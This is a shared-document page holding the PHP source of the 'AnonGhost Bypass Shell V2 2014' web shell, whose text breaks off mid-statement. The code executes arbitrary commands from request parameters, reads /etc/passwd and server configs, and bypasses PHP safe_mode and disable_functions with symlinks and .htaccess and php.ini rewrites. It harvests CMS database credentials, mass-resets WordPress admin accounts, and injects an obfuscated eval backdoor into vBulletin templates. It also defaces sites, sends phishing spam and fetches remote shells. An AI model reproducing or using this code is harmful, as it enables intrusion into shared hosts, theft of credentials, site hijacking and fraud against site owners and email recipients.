Upload
patrick-lewis
View
251
Download
0
Embed Size (px)
DESCRIPTION
config_bash
Citation preview
';if(isset($_POST['ms'])){error_reporting(0);$cmd="ls
/var/named";$r=shell_exec($cmd);mkdir('conkill',0777);$rr = "
Options all \n DirectoryIndex Sux.html \n AddType text/plain .php
\n AddHandler server-parsed .php \n AddType text/plain .html \n
AddHandler txt .html \n Require None \n Satisfy Any";$f =
fopen('conkill/.htaccess','w');$agshell =
symlink("/","conkill/root");fwrite($f , $rr);echo '';echo $r;echo
'
';}error_reporting(0);$webs=explode("\n",$_POST['web']);if(isset($_POST['w'])){$webs=explode("\n",$_POST['web']);echo
"DomainsUsersSymlink ";foreach($webs as
$f){$str=substr_replace($f,"",-4);$user =
posix_getpwuid(@fileowner("/etc/valiases/".$str));echo
"".$str."".$user['name']."Symlink"; flush();}}echo '
';}if(isset($_GET['action']) && $_GET['action'] ==
'file'){echo 'Symlink Info -Cms Scanner -Perl based symlink
-Symlink Manual -Manually Retrieve Config -Enable Symlink If
Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass
2014 ';echo '
Symlink Manual
';echo'
';$pfile = $_POST['file'];$symfile = $_POST['symfile'];$symlink =
$_POST['symlink'];if ($symlink){@mkdir('simfel',0777);$c = "Options
Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt
.php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt
.html \n Options all \n Options \n Allow from all \n Require None
\n Satisfy Any";$f =@fopen ('simfel/.htaccess','w');@fwrite($f ,
$c);@symlink("$pfile","simfel/$symfile");echo '
Done.. !
Open this file -> '.$symfile.'';}}if(isset($_GET['action'])
&& $_GET['action'] == 'manu'){echo 'Symlink Info -Cms
Scanner -Perl based symlink -Symlink Manual -Manually Retrieve
Config -Enable Symlink If Disabled -Python Bypass Forbidden Via TCP
Protocol -Symlink Bypass 2014 ';echo '
Manually Retrieve Config
';echo "
View fileView dir
";function red(){ $string = !empty($_POST['string']) ?
$_POST['string'] : 0;$switch = !empty($_POST['switch']) ?
$_POST['switch'] : 0;if ($string && $switch == "file")
{$stream = imap_open($string, "", "");if ($stream ==
FALSE)die("Can't open imap stream");$str = imap_body($stream, 1);if
(!empty($str))echo "".$str."";imap_close($stream);} elseif ($string
&& $switch == "dir") {$stream = imap_open("/etc/passwd",
"", "");if ($stream == FALSE)die("Can't open imap stream");$string
= explode("|",$string);if (count($string) > 1)$dir_list =
imap_list($stream, trim($string[0]),
trim($string[1]));else$dir_list = imap_list($stream,
trim($string[0]), "*");echo "";for ($i = 0; $i <
count($dir_list); $i++)echo "$dir_list[$i]\n";echo
"";imap_close($stream);}}if(strtolower(substr(PHP_OS, 0, 3)) ==
"win"){echo '
Sorry, This function does not work on Windows
platforms.
';}else{$slash="/";$basep=str_replace("\\","/",$basep);}$s=$_SERVER['PHP_SELF'];echo
'
SymLink With PHP
SymLink With OS :
';if ($_POST['mrc1'] && $_POST['mrc2']){if
(symlink($_POST['mrc1'],$_POST['mrc2'])){echo "alert('Symlink
Worked')";}else{echo "alert('Symlink Not Worked')";}}if
($_POST['mrci1'] && $_POST['mrci2']){if (system('ls -s
'.$_POST['mrci1']." ".$_POST['mrci2'])){echo "alert('Symlink
Worked')";}else{echo "alert('Symlink Didn't
Work')";}}}if(isset($_GET['action']) && $_GET['action'] ==
'ensim'){echo 'Symlink Info -Cms Scanner -Perl based symlink
-Symlink Manual -Manually Retrieve Config -Enable Symlink If
Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass
2014 ';echo '
Enable Symlink If Disabled
';echo '
'; error_reporting(0);
if(isset($_POST['ens'])){mkdir('ensim',0755);$rr ='Options
AllOptions +FollowSymLinksOptions +SymLinksIfOwnerMatchOptions
+ExecCGIAllowOverride AuthConfig FileInfo Indexes Limit
Options=Includes,Includes,Indexes,MultiViews,SymLinksIfOwnerMatch';$g
= fopen('ensim/.htaccess','w');fwrite($g,$rr);echo "
Symlink Function Enabled Successfully in apache pre main conf";}
}if(isset($_GET['action']) && $_GET['action'] ==
'maiilllerrr'){echo 'Mailer -Everything You Need -Paypal Checker
-Email Extractor';echo '
Spam Mailer
';$testa = $_POST['veio'];if($testa != "") {$message =
$_POST['html'];$subject =
$_POST['assunto'].$_POST['assunto2'];$nome = $_POST['nome'];$de =
$_POST['de'];$to = $_POST['emails'];$email = explode("\n",
$to);$message = stripslashes($message);$i = 0;$count =
1;while($email[$i]) {$ok = "ok";$headers = "MIME-Version:
1.0\n";$headers .= "Content-Type: text/html;
charset=UTF-8Content-Transfer-Encoding: 7bitX-Mailer: EDMAIL
R6.00.02Content-Length: 41061\n";$headers .= "From:
".$email[$i]."\r\n";if(mail($email[$i], $subject, $message,
$headers))echo "| Numero : [$count] ".$email[$i].": Sent . .
. *o*
";elseecho "| Numero : [$count] ".$email[$i].": Error in
Sending ? :(
";$i++;$count++;}$count--;if($ok == "ok")echo ""; }echo'|| Priv8
M@iler ||';echo'
| SUBJECT :
Select TitleTest TestApple Expiration de Votre Compte Ref : MNE0-13NBYou may to Update Your Account IDUpdate your account informationYour account has been limited until we hear from you OR
|LETTER :
| Reminder : Text HTML |
| MAILING LIST :
[email protected]| Mail List |
';}if(isset($_GET['action']) && $_GET['action'] ==
'simby'){echo 'Symlink Info -Cms Scanner -Perl based symlink
-Symlink Manual -Manually Retrieve Config -Enable Symlink If
Disabled -Python Bypass Forbidden Via TCP Protocol Symlink Bypass
2014 ';echo '
Symlink Bypass 2014 by Mauritania Attacker
';$fp = fopen("php.ini","w+");fwrite($fp,"safe_mode =
OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes =
NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE
");echo'
';echo 'PHP VERSION: ';echo phpversion();$fichier =
$_POST['file'];$ghostfile = $_POST['ghostfile'];$symlink =
$_POST['symlink'];if ($symlink){$dir =
"mauritania";if(file_exists($dir)) {echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
\n";} else {@mkdir($dir); {echo "
\!/ mauritania Folder Created ^_^ \!/
\n";echo "
\!/ $ghostfile Retrieved Successfully ^_^ \!/
\n";} }// Extract Priv8 htaccess File //$priv9 = "#Priv9 htaccess
By Mauritania AttackerOPTIONS Indexes FollowSymLinks
SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGIDirectoryIndex
$ghostfileForceType text/plainAddType text/plain .php AddType
text/plain .htmlAddType text/html .shtmlAddType txt .phpAddHandler
server-parsed .phpAddHandler txt .phpAddHandler txt .htmlAddHandler
txt .shtmlOptions AllOptions All";$f =@fopen
('mauritania/.htaccess','w');@fwrite($f ,
$priv9);@symlink("$fichier","mauritania/$ghostfile");echo '
'.$ghostfile.'';}}if(isset($_GET['action']) &&
$_GET['action'] == 'cmd'){echo 'MySQL & PostgreSql Connect
-Command Execution -Base64 Command -Config Grabber -Subdomain
Checker -Joomla Reverse Server - Wordpress Reverse Server -Find
Directory Writable/Readable -Zone-h Notifier -Shtml Command Shell
-Back connect Simple -Ruby BackConnect -Perl BackConnect -Python
BackConnect -Exploit -Whcms Killer -Webmail Password Changer
-Wordpress Csrf Exploit';echo '
Command Execution
';echo '
';if (strlen($_GET['command'])>1 &&
$_GET['execmethod']!="popen"){echo
$_GET['execmethod']($_GET['command']);}if
(strlen($_POST['command'])>1 &&
$_POST['execmethod']!="popen"){echo
$_POST['execmethod']($_POST['command']);}if
(strlen($_GET['command'])>1 &&
$_GET['execmethod']=="popen"){popen($_GET['command'],"r");}echo'
System Exec Passthrupopen ';}if(isset($_GET['action']) &&
$_GET['action'] == 'com64'){echo 'MySQL & PostgreSql Connect
-Command Execution -Base64 Command -Config Grabber -Subdomain
Checker -Joomla Reverse Server - Wordpress Reverse Server -Find
Directory Writable/Readable -Zone-h Notifier -Shtml Command Shell
-Back connect Simple -Ruby BackConnect -Perl BackConnect -Python
BackConnect -Exploit -Whcms Killer -Webmail Password Changer
-Wordpress Csrf Exploit';echo '
Base64 Command
';echo ' ';if (empty($_POST['fak'])){echo '
';}else{$b4se64 =$_POST['fak'];$heno =base64_encode($b4se64);echo
'';echo '';print $heno;echo '';}echo ' ReadCommand';if(
!empty($_POST['coz']) )if ($dec=='decode'){echo '';}echo
"";$ss=$_POST['coz'];$file =
base64_decode($ss);if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file)))
and empty($file))if ($_POST['dec']=='decode'){echo
base64_encode($_POST['codene']);}echo '';echo
'';}if(isset($_GET['action']) && $_GET['action'] ==
'vgrab'){echo 'MySQL & PostgreSql Connect -Command
Execution -Base64 Command -Config Grabber -Subdomain Checker
-Joomla Reverse Server - Wordpress Reverse Server -Find Directory
Writable/Readable -Zone-h Notifier -Shtml Command Shell -Back
connect Simple -Ruby BackConnect -Perl BackConnect -Python
BackConnect -Exploit -Whcms Killer -Webmail Password Changer
-Wordpress Csrf Exploit';echo "
Config Grabber";?>
/etc/passwd content
config".$r."";flush();}else{echo
"$dominconfigfailed";flush();}}die();}if(!is_file('named.txt')){$d00m
= @file("/etc/named.conf");flush();}else{$d00m =
file("named.txt");}if(!$d00m){die ("");}else{echo "
Domains Config Result ";$f =
fopen('joomla.txt','w');foreach($d00m as
$dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom,
$domvw);if(strlen(trim($domvw[1][0])) > 2){$user =
posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));$wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/configuration.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php";$wpp3=get_headers($wp3);$wp13=$wpp3[0];$pos
= strpos($wp, "200");$config="";if (strpos($wp, "200") == true ){
$config= $wpl;}elseif (strpos($wp12, "200") == true){ $config=
$wp2;}elseif (strpos($wp13, "200") == true){ $config=
$wp3;}else{continue;}flush();$dom = $domvw[1][0];$w =
fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r =
'failed';}echo
"".$domvw[1][0]."config".$r."";flush();}}}}echo "
";}if(isset($_GET['action']) && $_GET['action'] ==
'wp'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass
Change Admin vBulletin -Mass Change Admin WordPress -Wordpress
& Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla
Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto
Defacer ';echo '
Mass Change Admin Mass WordPress
';if(isset($_POST['s'])){$file = @file_get_contents('wp.txt');$ex =
explode("\n",$file);echo " Domains Configs
Result ";flush();flush();foreach ($ex as $exp){$es =
explode("||",$exp);$config = $es[0];$domin = $es[1];$domins =
trim($domin).'';$readconfig =
@file_get_contents(trim($config));if(ereg('wp-settings.php',$readconfig)){$pass
= ex($readconfig,"define('DB_PASSWORD', '","');");$userdb =
ex($readconfig,"define('DB_USER', '","');");$db =
ex($readconfig,"define('DB_NAME', '","');");$fix =
ex($readconfig,'$table_prefix = \'',"';");$tab = $fix.'users';$con
= @mysql_connect('localhost',$userdb,$pass);$db =
@mysql_select_db($db,$con);$query = @mysql_query("UPDATE `$tab` SET
`user_login` ='virusa'") or die;$query = @mysql_query("UPDATE
`$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or
die;if ($query){$r = 'Succeed user [virusa] pass
[1]';}else{$r = 'failed';}$domins = trim($domin).'';echo
"$dominconfig".$r."";flush();flush();}else{echo
"$dominconfigfailed2";flush();flush();}}die();}if(!is_file('named.txt')){$d00m
= @file("/etc/named.conf");}else{$d00m =
@file("named.txt");}if(!$d00m){die ("");}else{echo "
Domains Config Result ";flush();flush();$f =
fopen('wp.txt','w');foreach($d00m as
$dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom,
$domvw);if(strlen(trim($domvw[1][0])) > 2){$user =
posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));$wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp/wp-config";$wpp3=get_headers($wp3);$wp13=$wpp3[0];$pos
= strpos($wp, "200");$config="";if (strpos($wp, "200") == true ){
$config= $wpl;}elseif (strpos($wp12, "200") == true){ $config=
$wp2;}elseif (strpos($wp13, "200") == true){ $config=
$wp3;}else{continue;}flush();$dom = $domvw[1][0];$w =
fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r =
'failed';}echo
"".$domvw[1][0]."Config".$r."";flush();flush();flush();}}}}echo
"
";}if(isset($_GET['action']) && $_GET['action'] ==
'vb'){echo 'Mass Deface Dirs -Mass Change Admin Joomla -Mass
Change Admin vBulletin -Mass Change Admin WordPress -Wordpress
& Joomla Mass Deface -Wordpress Index Hijack Priv8 -Joomla
Index Changer -Wordpress Index Changer -Cpanel & Ftp Auto
Defacer ';echo '
Mass Change Admin vBulletin
';if(isset($_POST['s'])){$file = @file_get_contents('vb.txt');$ex =
explode("\n",$file);echo " Domains Configs
Result ";foreach ($ex as $exp){$es =
explode("||",$exp);$config = $es[0];$domin = $es[1];$domins =
trim($domin).'';$readconfig =
@file_get_contents(trim($config));if(ereg('vBulletin',$readconfig)){$db
= ex($readconfig,'$config[\'Database\'][\'dbname\'] =
\'',"';");$userdb =
ex($readconfig,'$config[\'MasterServer\'][\'username\'] =
\'',"';");$pass =
ex($readconfig,'$config[\'MasterServer\'][\'password\'] =
\'',"';");$con = @mysql_connect('localhost',$userdb,$pass);$db =
@mysql_select_db($db,$con);$shell =
"bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw=="
;$crypt = "{\${eval(gzinflate(base64_decode(\'";$crypt .=
"$shell";$crypt .= "\')))}}{\${exit()}}";$sqlfaq = "UPDATE template
SET template ='".$crypt."' WHERE title ='FAQ'" ;$query =
@mysql_query($sqlfaq,$con);if ($query){$r = 'Succeed shell
in search.php';}else{$r = 'failed';}$domins =
trim($domin).'';echo "$dominConfig".$r."";}else{echo
"$dominConfigfailed2";}}die();}if(!is_file('named.txt')){$d00m
= file("/etc/named.conf");}else{$d00m =
file("named.txt");}if(!$d00m){die ("");}else{echo "
Domains Config Result ";$f =
fopen('vb.txt','w');foreach($d00m as
$dom){if(eregi("zone",$dom)){preg_match_all('#zone "(.*)"#', $dom,
$domvw);if(strlen(trim($domvw[1][0])) > 2){$user =
posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));///////////////////////////////////////////////////////////////////////////////////$wpl=$pageURL."/sim/rut/home/".$user['name']."/includes/config.php";$wpp=get_headers($wpl);$wp=$wpp[0];$wp2=$pageURL."/sim/rut/home/".$user['name']."/vb/includes/config.php";$wpp2=get_headers($wp2);$wp12=$wpp2[0];$wp3=$pageURL."/sim/rut/home/".$user['name']."/forum/includes/config.php";$wpp3=get_headers($wp3);$wp13=$wpp3[0];
////////// vb ////////////$pos = strpos($wp, "200");$config="";if
(strpos($wp, "200") == true ){ $config= $wpl;}elseif (strpos($wp12,
"200") == true){ $config= $wp2;}elseif (strpos($wp13, "200") ==
true){ $config= $wp3;}else{continue;}flush();$dom = $domvw[1][0];$w
= fwrite($f,"$config||$dom \n");if($w){$r = 'Save';}else{$r
= 'failed';}echo
"".$domvw[1][0]."Config".$r."";flush();}}}}echo "
";}if(isset($_GET['action']) && $_GET['action'] ==
'abot'){echo '
AnonGhost Bypass Shell V2 2014
Coded by Virusa Worm - Mauritania Attacker - GrenCoder
AnonGhost Bypass Shell V2 2014 is created for Educational Purpose
and testing on your own server, and not responsible for any misuse
of it.
At first a Web Hacker was someone who would spend long hours trying
to find bugs and exploit manually.
The term has now changed known as a Defacer nowadays.
Tools does not Made Hackers , Hackers make Tools.
Do not Learn To Hack , Hack to Learn.wkkwk..
"Keep Calm and enjoy Hacking \!/"
Special thankz to : AnonGhost Team
Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3
Cyber Army - TeaMp0isoN - Robot Pirates - X-Blackerz INC. - Pak
Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa
Bicara - Maniak k4Sur [pasangan galo.. lol..]]
';}if(isset($_GET['action']) && $_GET['action'] ==
'read'){echo 'Symlink Info -Cms Scanner -Perl based symlink
-Symlink Manual -Manually Retrieve Config -Enable Symlink If
Disabled -Python Bypass Forbidden Via TCP Protocol -Symlink Bypass
2014 ';echo '
Read /etc/passwd
';echo "
";flush();flush();$file = '/etc/named.conf';$w0co = @fopen($file,
'r');if ($w0co){$content = @fread($w0co, @filesize($file));echo
"".htmlentities($content)."";}else if (!$w0co){$w0co =
@show_source($file) ;}else if (!$w0co){$w0co =
@highlight_file($file);}else if (!$w0co){$sm =
@symlink($file,'sym.txt');if ($sm){$w0co = @fopen('sim/sym.txt',
'r');$content = @fread($w0co, @filesize($file));echo
"".htmlentities($content)."";}}echo "
";if(isset($_GET['save'])){$cont = stripcslashes($_POST['file']);$f
= fopen('named.txt','w');$w = fwrite($f,$cont);if($w){echo '
save has been successfully';}fclose($f);}}if(isset($_GET['action'])
&& $_GET['action'] == 'bforb'){echo 'Bypass /etc/passwd
-Bypass Users Server -Bypass Perl Security -Bypass With Zip File
-Bypass system function -Bypass With exec Function -Bypass With
shell_exec -Bypass posix_getpwuid -Bypass PHP Suhosin function
blacklist -Bypass Functions suPHP_ConfigPath -Bypass suPHP Security
-Simple Bypasser -Read Files -Bypass Chmod Directory -Bypass
Forbidden 2014 -Bypass SafeMode 2014 Priv8 ';echo '
Bypass Root Path with system function
';mkdir('bforb', 0755);chdir('bforb');$bforb =
'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBCeXBhc3MgUm9vdCBQYXRoIGJ5IFZpcnVzYSBXb3JtPC90aXRsZT48L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj48IS0tIGJvZHkge2JhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OyBmb250LWZhbWlseTpDb3VyaWVyCW1hcmdpbi1sZWZ0OiAwcHg7IG1hcmdpbi10b3A6IDBweDsgdGV4dC1hbGlnbjogY2VudGVyOyBOZXc7Zm9udC1zaXplOjEycHg7Y29sb3I6IzAwOTkwMDtmb250LXdlaWdodDo0MDA7fSBhe3RleHQtZGVjb3JhdGlvbjpub25lO30gYTpsaW5rIHtjb2xvcjojMDA5OTAwO30gYTp2aXNpdGVkIHtjb2xvcjojMDA3NzAwO30gYTpob3Zlcntjb2xvcjojMDBmZjAwO30gYTphY3RpdmUge2NvbG9yOiMwMDk5MDA7fSAtLT48IS0tIE1hZGUgQnkgVmlydXNhIFdvcm0gLS0+PC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgZWNobyAiPGNlbnRlcj48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQnlwYXNzIGl0JyBuYW1lPSd2aXJ1c2EnPjwvY2VudGVyPiI7IGlmIChpc3NldCgkX1BPU1RbJ3ZpcnVzYSddKSl7IHN5c3RlbSgnbG4gLXMgLyB2aXJ1c2EudHh0Jyk7ICRmdmNrZW0gPSdUM0IwYVc5dWN5QkpibVJsZUdWeklFWnZiR3h2ZDFONWJVeHBibXR6RFFwRWFYSmxZM1J2Y25sSmJtUmxlQ0J6YzNOemMzTXVhSFJ0RFFwQlpHUlVlWEJsSUhSNGRDQXVjR2h3RFFwQlpHUklZVzVrYkdWeUlIUjRkQ0F1Y0dodyc7ICRmaWxlID0gZm9wZW4oIi5odGFjY2VzcyIsIncrIik7ICR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLGJhc2U2NF9kZWNvZGUoJGZ2Y2tlbSkpOyAkdmlydXNhID0gc3ltbGluaygiLyIsInZpcnVzYS50eHQiKTsgJHJ0PSI8YnI+PGEgaHJlZj12aXJ1c2EudHh0IFRBUkdFVD0nX2JsYW5rJz48Zm9udCBjb2xvcj0jMDBiYjAwIHNpemU9MiBmYWNlPSdDb3VyaWVyIE5ldyc+PGI+QnlwYXNzZWQgU3VjY2Vzc2Z1bGx5PC9iPjwvZm9udD48L2E+IjsgZWNobyAiPGJyPjxicj48Yj5Eb25lLi4gITwvYj48YnI+PGJyPkNoZWNrIGxpbmsgZ2l2ZW4gYmVsb3cgZm9yIC8gZm9sZGVyIHN5bWxpbmsgPGJyPiRydDwvY2VudGVyPiI7fSBlY2hvICI8L2Zvcm0+IjsgID8+PC90ZD48L3RyPjwvYm9keT48L2h0bWw+';$file
= fopen("bforb.php" ,"w+");$write = fwrite ($file
,base64_decode($bforb));fclose($file);chmod("bforb.php",0755);echo
"";}if(isset($_GET['action']) && $_GET['action'] ==
'grasy'){echo 'Bypass /etc/passwd -Bypass Users Server -Bypass
Perl Security -Bypass With Zip File -Bypass system function -Bypass
With exec Function -Bypass With shell_exec -Bypass posix_getpwuid
-Bypass PHP Suhosin function blacklist -Bypass Functions
suPHP_ConfigPath -Bypass suPHP Security -Simple Bypasser -Read
Files -Bypass Chmod Directory -Bypass Forbidden 2014 -Bypass
SafeMode 2014 Priv8 ';echo '
Bypass /etc/passwd Priv8
Coded By Mauritania Attacker
';echo 'Bypass with System Function
Bypass with Passthru Function
Bypass with exec Function
Bypass with shell_exec Function
Bypass with posix_getpwuid Function
'; //System Function //if($_POST['syst']){echo"";echo system("cat
/etc/passwd");echo"
";echo"
";}echo ''; //Passthru Function //if($_POST['passth']){echo"";echo
passthru("cat /etc/passwd");echo"
";echo"
"; }echo ''; //exec Function //if($_POST['ex']){echo"";echo
exec("cat /etc/passwd");echo"
";echo"
";}echo '';//exec Function //if($_POST['shex']){echo"";echo
shell_exec("cat /etc/passwd");echo"
";echo"
";}echo ''; //posix_getpwuid Function
//if($_POST['mauritania']){echo"";for($uid=0;$uid $value) { print
$value; } break;case 'fread': $fopen = @fopen($file,"r") or
die("Unable to open file!"); $fread = @fread($fopen,90000);
fclose($fopen); print_r($fread); break;case 'file_get_contents':
$file_get_contents = @file_get_contents($file);
print_r($file_get_contents); break;case 'fgets': $fgets =
@fopen($file,"r") or die("Unable to open file!");
while(!feof($fgets)) { echo fgets($fgets); } fclose($fgets);
break;default: echo "{$web} Not There"; } } echo "
";$file = trim($_POST['file']);if($_POST['start']){readfils($file);
}echo "";}if(isset($_GET['action']) && $_GET['action'] ==
'wrdprshtmlinj'){echo 'Mass Deface Dirs -Mass Change Admin
Joomla -Mass Change Admin vBulletin -Mass Change Admin WordPress
-Wordpress & Joomla Mass Deface -Wordpress Index Hijack Priv8
-Joomla Index Changer -Wordpress Index Changer -Cpanel & Ftp
Auto Defacer ';echo '
Wordpress Index Hijack Priv8
Coded By Mauritania Attacker
';$pghost = $_POST['pghost'];$dbnmn = $_POST['dbnmn'];$dbusrrrr =
$_POST['dbusrrrr'];$pwddbbn = $_POST['pwddbbn'];$index =
stripslashes($_POST['pown']);$prefix = $_POST['prefix'];//$prefix =
"wp_";if ($_POST['up2']) {@mysql_connect($pghost, $dbusrrrr,
$pwddbbn) or die(mysql_error());@mysql_select_db($dbnmn) or
die(mysql_error());$tableName = $prefix . "posts";$ghost1 =
mysql_query("UPDATE $tableName SET post_title ='" . $index . "'
WHERE ID > 0 ");if (!$ghost1) {$ghost2 = mysql_query("UPDATE
$tableName SET post_content ='" . $index . "' WHERE ID > 0 ");}
elseif (!$ghost2) {$ghost3 = mysql_query("UPDATE $tableName SET
post_name ='" . $index . "' WHERE ID > 0 ");}mysql_close();if
($ghost1 || $ghost2 || $ghost3) {echo "Index Website Have been
Hijacked Successfully";} else {echo "Failed To Hijack the
Website :(";}}}if(isset($_GET['action']) &&
$_GET['action'] == 'baidir'){echo 'Bypass /etc/passwd -Bypass
Users Server -Bypass Perl Security -Bypass With Zip File -Bypass
system function -Bypass With exec Function -Bypass With shell_exec
-Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist
-Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple
Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014
-Bypass SafeMode 2014 Priv8 ';echo '
Bypass Chmod Directory Priv8
Coded By Mauritania Attacker
';echo '';if($_POST){$mauritania = $_POST['file'];$ch =
@chmod($mauritania,'0311');if($ch){echo "[+] Directory
=>{$mauritania} => [+] Permission Changed Successfully
Bypassed ^_^ [+]";}else{echo "[-] Directory =>{$mauritania}
=> [-] Permission can't be changed , maybe chmod function is
disabled :( [-]";}}}if(isset($_GET['action']) &&
$_GET['action'] == 'forb14'){echo 'Bypass /etc/passwd -Bypass
Users Server -Bypass Perl Security -Bypass With Zip File -Bypass
system function -Bypass With exec Function -Bypass With shell_exec
-Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist
-Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple
Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014
-Bypass SafeMode 2014 Priv8 ';echo '
Bypass Forbidden 2014
Coded by Mauritania Attacker
';$fp = fopen("php.ini","w+");fwrite($fp,"safe_mode =
OFFSafe_mode_gid = OFFdisable_functions = NONEdisable_classes =
NONEopen_basedir = OFFsuhosin.executor.func.blacklist = NONE
");echo'
';echo 'PHP VERSION: ';echo phpversion();$fichier =
$_POST['file'];$ghostfile = $_POST['ghostfile'];$symlink =
$_POST['symlink'];if ($symlink){$dir =
"mauritania";if(file_exists($dir)) {echo "
[+] mauritania Folder Already Exist _ are you Drunk XD !!!
";} else {@mkdir($dir); {echo '
\!/ mauritania Folder Created ^_^ \!/ ';echo '
File Retrieved Successfully';} }$priv9 = "#Priv9 htaccess By
Mauritania AttackerOPTIONS Indexes FollowSymLinks
SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGIOptions Indexes
FollowSymLinksDirectoryIndex $ghostfileForceType text/plainAddType
text/plain .php AddType text/plain .htmlAddType text/html
.shtmlAddType txt .phpAddHandler server-parsed .phpAddHandler txt
.phpAddHandler txt .htmlAddHandler txt .shtmlOptions AllSetEnv
PHPRC ".dirname(__FILE__)."/mauritania/php.inisuPHP_ConfigPath
".dirname(__FILE__)."/mauritania/php.ini";$f =@fopen
('mauritania/.htaccess','w');@fwrite($f ,
$priv9);@symlink("$fichier","mauritania/$ghostfile");echo '
'.$ghostfile.'';}}if(isset($_GET['action']) &&
$_GET['action'] == 'smod14'){echo 'Bypass /etc/passwd -Bypass
Users Server -Bypass Perl Security -Bypass With Zip File -Bypass
system function -Bypass With exec Function -Bypass With shell_exec
-Bypass posix_getpwuid -Bypass PHP Suhosin function blacklist
-Bypass Functions suPHP_ConfigPath -Bypass suPHP Security -Simple
Bypasser -Read Files -Bypass Chmod Directory -Bypass Forbidden 2014
-Bypass SafeMode 2014 Priv8 ';echo '
Bypass SafeMode 2014 Priv8
Coded by Mauritania Attacker
';echo "
Cwd Shell ini.php
";echo "Results Will Appear Here ^_^ ";if($_POST['start']) {$zero =
$_POST['zero'];$file = $_POST['shell'];$mauritania =
$_POST['rim'];$htaccess = "SecFilterEngine OffSecFilterScanPOST
OffSecFilterCheckURLEncoding OffSecFilterCheckCookieFormat
OffSecFilterCheckUnicodeEncoding OffSecFilterNormalizeCookies
Offorder deny,allowdeny from allallow from allorder deny,allowdeny
from allSetEnv PHPRC $zero/ghost/php.ini";$phpini =
"c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";$dir
= "ghost"; if(file_exists($dir)) {echo "[+] ghost Folder Already
Exist are you drunk :o xD !";} else {@mkdir($dir); {echo "[+] ghost
Folder Has Been Created Nygga :3 !";} }#Generate Sh3LL$fopen =
fopen("ghost/priv8.php5",'w');$shell =
@file_get_contents($file);$swrite = fwrite($fopen
,$shell);if($swrite){echo "Shell Has Been Downloaded :
$zero/ghost/priv8.php5 ";} else {echo "Can't Download Shell :( do
it manually :D ";}fclose($fopen);#Generate Htaccess$kolsv =
fopen("ghost/.htaccess", "w");$hwrite = fwrite($kolsv,
$htaccess);if($hwrite){echo ".htaccess Generated Successfully
\!/";} else {echo "Can't Generate
Htaccess";}fclose($kolsv);#Generate ini.php$xopen =
fopen("ghost/ini.php",'w');$rim =
